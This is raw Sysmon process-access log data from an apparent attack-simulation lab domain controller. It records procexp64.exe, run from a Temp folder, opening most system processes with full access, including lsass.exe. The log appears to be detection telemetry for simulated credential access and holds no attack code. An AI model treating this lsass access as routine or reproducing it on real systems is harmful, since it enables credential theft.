15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:09.689{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.783{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.783{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 